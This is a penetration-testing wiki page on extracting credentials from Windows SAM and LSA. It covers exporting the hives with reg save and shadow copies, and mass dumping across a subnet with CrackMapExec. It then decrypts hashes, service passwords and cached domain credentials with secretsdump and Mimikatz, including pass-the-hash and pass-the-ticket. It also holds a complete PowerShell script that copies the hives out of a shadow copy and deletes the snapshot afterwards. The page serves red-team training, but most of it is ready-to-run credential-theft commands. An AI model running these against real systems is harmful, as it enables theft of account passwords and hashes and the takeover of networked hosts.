# Local credentials (SAM and LSA)

## Overview

SAM (Security Accounts Manager) and LSA (Local Security Authority) are the two parts of the Windows security architecture that hold credential material on every Windows host, whether or not it is domain-joined.

The SAM database is a registry hive (`HKLM\SAM`) that stores the local user and group accounts: usernames, RIDs, account status, group membership and the password hashes (NT hashes, plus LM hashes on legacy configurations). Windows uses it to authenticate local accounts and to apply the machine's local account policy.

LSA is the security subsystem (running inside `lsass.exe`) that authenticates users, enforces the local security policy and issues access tokens. Its persistent state, usually called the LSA secrets, lives in the `HKLM\SECURITY` hive: service and scheduled-task account passwords, the machine account password (`$MACHINE.ACC`), the `DPAPI_SYSTEM` key, auto-logon credentials and the cached domain logon hashes (DCC2, also called MSCache2) of domain users who have logged on to the host.

In summary, the SAM hive holds the local accounts and their hashes, while the SECURITY hive holds the secrets LSA keeps on behalf of services, the machine itself and previously logged-on domain users. Both hives are encrypted with keys derived from the boot key (SysKey), which is stored in the `HKLM\SYSTEM` hive, so neither can be decrypted without a copy of SYSTEM.

| Hive     | Details                                                                                                                                                 |
| -------- | ------------------------------------------------------------------------------------------------------------------------------------------------------- |
| SAM      | Local user and group accounts with their NT (and legacy LM) password hashes.                                                                            |
| SECURITY | LSA secrets: clear text service and scheduled-task passwords, the machine account password, the `DPAPI_SYSTEM` key and cached domain credentials (DCC2). |
| SYSTEM   | Holds the boot key (SysKey) needed to derive the keys that decrypt the SAM and SECURITY hives.                                                          |

## Obtaining the SAM and LSA database

{% tabs %}
{% tab title="Registry" %}
{% hint style="warning" %}
Decrypting the SAM hive requires both the SAM and the SYSTEM hive: the boot key (SysKey) stored in SYSTEM is used to derive the key that protects the hashes.

Decrypting the LSA secrets requires both the SECURITY and the SYSTEM hive, for the same reason. Exporting any of the three hives requires administrative privileges; `reg save` reads the live hive, so no shadow copy is needed for this method.
{% endhint %}

```powershell
# Run from an elevated prompt; each command writes the hive to a file in the current directory
reg save HKLM\sam sam
reg save HKLM\system system
reg save HKLM\security security
```

{% endtab %}

{% tab title="Volume Shadow Copy" %}
Creating a shadow copy.

```powershell
wmic shadowcopy call create Volume='C:\'
```

List existing shadow copies and note the "Shadow Copy Volume" device name (`\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopyN`) of the one just created; it is used as the source path below.

```powershell
vssadmin list shadows
```

Copying the SAM database. The shadow copy number (`HarddiskVolumeShadowCopy1` here) must match the device name reported by `vssadmin list shadows`.

{% code overflow="wrap" %}

```powershell
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\system32\config\sam C:\users\offsec.corp1\Downloads\sam
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\system32\config\system C:\users\offsec.corp1\Downloads\system
```

{% endcode %}

Copying the LSA database. The SYSTEM hive copied above is needed for this one as well.

{% code overflow="wrap" %}

```powershell
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\system32\config\security C:\users\offsec.corp1\Downloads\security
```

{% endcode %}
{% endtab %}

{% tab title="CrackMapExec" %}
Obtaining the SAM hashes of every host in the range on which the supplied credentials are a local administrator.

```
crackmapexec smb 192.168.1.0/24 -u {username} -p {password} --sam
```

Obtaining the LSA secrets, including cached domain credentials (DCC2), from the same hosts.

```
crackmapexec smb 192.168.1.0/24 -u {username} -p {password} --lsa
```

{% endtab %}

{% tab title="Full memory dump and Volatility" %}

### Full memory dump and Volatility

{% embed url="<https://www.magnetforensics.com/resources/magnet-ram-capture/>" %}

Obtain a full memory dump with Magnet RAM Capture or another forensic acquisition tool. The SAM hashes and LSA secrets can then be recovered from the hive data cached in memory, without touching the files on disk.

#### Using volatility to read memory and obtain credentials

{% embed url="<https://github.com/volatilityfoundation/volatility3/releases/tag/v1.0.0>" %}

{% embed url="<https://www.volatilityfoundation.org/3>" %}

```powershell
# Local SAM hashes from the in-memory copy of the SAM and SYSTEM hives
py .\vol.py -f C:\Users\admin\ram_memdump.raw windows.hashdump.Hashdump
# The LSA secrets and cached domain credentials use the windows.lsadump.Lsadump
# and windows.cachedump.Cachedump plugins of the same framework
```

{% endtab %}
{% endtabs %}
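The Volume Shadow Copy procedure above, carried out end to end in one PowerShell script, as an added example that is not part of the original page: it creates the shadow copy through WMI, resolves the device object instead of hard-coding `HarddiskVolumeShadowCopy1`, copies all three hives, checks that each file starts with the `regf` hive signature, prints a SHA-256 for chain of custody and deletes the shadow copy afterwards. The volume `C:\` and the output folder `C:\Temp\hives` are assumptions; run it from an elevated prompt.

```powershell
#Requires -RunAsAdministrator
# Added example, not code from the original page.
# Assumptions: system volume is C:\, hives are written to C:\Temp\hives.

$Volume = 'C:\'
$OutDir = 'C:\Temp\hives'
$Hives  = @('SAM', 'SECURITY', 'SYSTEM')   # all three are needed to decrypt anything

New-Item -ItemType Directory -Path $OutDir -Force | Out-Null

# 1. Create a shadow copy; this is the same operation as "wmic shadowcopy call create".
$result = (Get-WmiObject -List Win32_ShadowCopy).Create($Volume, 'ClientAccessible')
if ($result.ReturnValue -ne 0) {
    throw "Shadow copy creation failed (ReturnValue $($result.ReturnValue))"
}

# 2. Resolve the device object of the new copy (\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopyN)
#    instead of guessing the number from "vssadmin list shadows".
$shadow = Get-WmiObject Win32_ShadowCopy | Where-Object { $_.ID -eq $result.ShadowID }
$device = $shadow.DeviceObject
Write-Output "Shadow copy device: $device"

# 3. Copy the hives out of the snapshot. cmd.exe's copy understands the \\?\GLOBALROOT
#    path; Copy-Item does not, so the copy is delegated to cmd.
foreach ($hive in $Hives) {
    $src = "$device\Windows\System32\config\$hive"
    $dst = Join-Path $OutDir $hive.ToLower()
    cmd /c copy /y "$src" "$dst" | Out-Null
    if (-not (Test-Path -Path $dst)) { throw "Failed to copy $hive from $src" }
}

# 4. Sanity check: a registry hive file starts with the ASCII magic "regf".
foreach ($hive in $Hives) {
    $path = Join-Path $OutDir $hive.ToLower()
    $fs   = [System.IO.File]::OpenRead($path)
    $buf  = New-Object byte[] 4
    [void]$fs.Read($buf, 0, 4)
    $fs.Close()
    $magic = [System.Text.Encoding]::ASCII.GetString($buf)
    if ($magic -ne 'regf') {
        Write-Warning "$path does not look like a registry hive (magic '$magic')"
    }
    # Record a hash of what was collected so the offline copy can be matched later.
    Get-FileHash -Algorithm SHA256 -Path $path
}

# 5. Remove the shadow copy so it is not left behind on the host.
$shadow.Delete()
```

The three files in `C:\Temp\hives` can be fed straight to `secretsdump.py -sam sam -security security -system system LOCAL` or to the Mimikatz `lsadump::sam` / `lsadump::secrets` offline forms shown in the next section. Creating a shadow copy and reading hives out of it is noisy (event IDs from the VSS service and, with Sysmon, the `\\?\GLOBALROOT` access), so on an engagement expect it to be visible to defenders.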

## Decoding the SAM and LSA database

{% tabs %}
{% tab title="secretsdump" %}
Impacket's secretsdump is a Python tool for extracting credentials from Windows systems. From the SAM it recovers the local account password hashes; from the LSA (SECURITY hive) it recovers the LSA secrets (service passwords, the machine account password, `DPAPI_SYSTEM`) and the cached domain credentials (DCC2). Remotely it performs the hive export itself over SMB and the remote registry service, and it can also dump `NTDS.dit` from a domain controller; offline it works on hives exported with the methods above.

{% code overflow="wrap" %}

```bash
# Remote dumping of SAM & LSA secrets
secretsdump.py 'DOMAIN/USER:PASSWORD@TARGET'

# Remote dumping of SAM & LSA secrets (pass-the-hash; the LM half can be left empty)
secretsdump.py -hashes 'LMhash:NThash' 'DOMAIN/USER@TARGET'

# Remote dumping of SAM & LSA secrets (pass-the-ticket; uses the ccache in KRB5CCNAME)
secretsdump.py -k 'DOMAIN/USER@TARGET'

# Offline dumping of LSA secrets from exported hives (the LOCAL keyword replaces the target)
secretsdump.py -security '/path/to/security.save' -system '/path/to/system.save' LOCAL

# Offline dumping of SAM secrets from exported hives
secretsdump.py -sam '/path/to/sam.save' -system '/path/to/system.save' LOCAL

# Offline dumping of SAM & LSA secrets from exported hives
secretsdump.py -sam '/path/to/sam.save' -security '/path/to/security.save' -system '/path/to/system.save' LOCAL
```

{% endcode %}
{% endtab %}

{% tab title="Mimikatz" %}
Mimikatz is a Windows post-exploitation tool that extracts password hashes, plaintext passwords and Kerberos tickets from memory and from the registry on a compromised system. The `lsadump::sam` and `lsadump::secrets` modules below read the hives directly on the live host and therefore need SYSTEM privileges (`privilege::debug` followed by `token::elevate`); the cached domain credentials are dumped with `lsadump::cache` in the same way.

{% code overflow="wrap" %}

```bash
# Local dumping of SAM secrets on the target (run privilege::debug and token::elevate first)
lsadump::sam

# Offline dumping of SAM secrets from exported hives
lsadump::sam /sam:'C:\path\to\sam.save' /system:'C:\path\to\system.save'

# Local dumping of LSA secrets on the target (same elevation as above)
lsadump::secrets

# Offline dumping of LSA secrets from exported hives
lsadump::secrets /security:'C:\path\to\security.save' /system:'C:\path\to\system.save'
```

{% endcode %}
{% endtab %}

{% tab title="CrackMapExec" %}
CrackMapExec (Python) can remotely dump SAM and LSA secrets from many hosts at once, using Impacket's secretsdump under the hood. It supports the same authentication methods: password, pass-the-hash (NTLM) and pass-the-ticket (Kerberos). In the commands below `--sam/--lsa` means either `--sam` or `--lsa`; `--lsa` also returns the cached domain credentials.

{% code overflow="wrap" %}

```bash
# Remote dumping of SAM/LSA secrets (domain account that is a local admin on the targets)
crackmapexec smb $TARGETS -d $DOMAIN -u $USER -p $PASSWORD --sam/--lsa

# Remote dumping of SAM/LSA secrets (local user authentication)
crackmapexec smb $TARGETS --local-auth -u $USER -p $PASSWORD --sam/--lsa

# Remote dumping of SAM/LSA secrets (pass-the-hash)
crackmapexec smb $TARGETS -d $DOMAIN -u $USER -H $NThash --sam/--lsa

# Remote dumping of SAM/LSA secrets (pass-the-ticket; uses the ccache in KRB5CCNAME)
crackmapexec smb $TARGETS --kerberos --sam/--lsa
```

{% endcode %}
{% endtab %}
{% endtabs %}

## References

{% embed url="<https://www.thehacker.recipes/ad/movement/credentials/dumping/sam-and-lsa-secrets>" %}
